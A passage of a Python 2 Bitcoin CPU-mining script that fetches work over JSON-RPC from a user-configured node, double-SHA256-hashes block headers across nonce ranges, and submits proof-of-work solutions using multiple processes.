self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8800
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.